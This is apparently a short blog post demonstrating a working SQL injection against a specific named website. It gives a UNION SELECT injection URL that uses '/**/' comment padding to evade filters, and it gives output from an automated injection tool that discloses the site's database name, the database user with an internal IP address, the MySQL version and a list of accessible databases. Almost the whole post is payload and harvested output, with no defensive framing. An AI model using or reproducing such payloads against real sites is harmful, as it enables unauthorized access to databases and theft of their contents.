Demo: http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7/*
Database info:
[+] URL:http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 10:40:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dotaportal
User: dotaportal@192.168.10.21
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 2
[0]dotaportal
[1]meetyourmakers
0 comments:
Post a Comment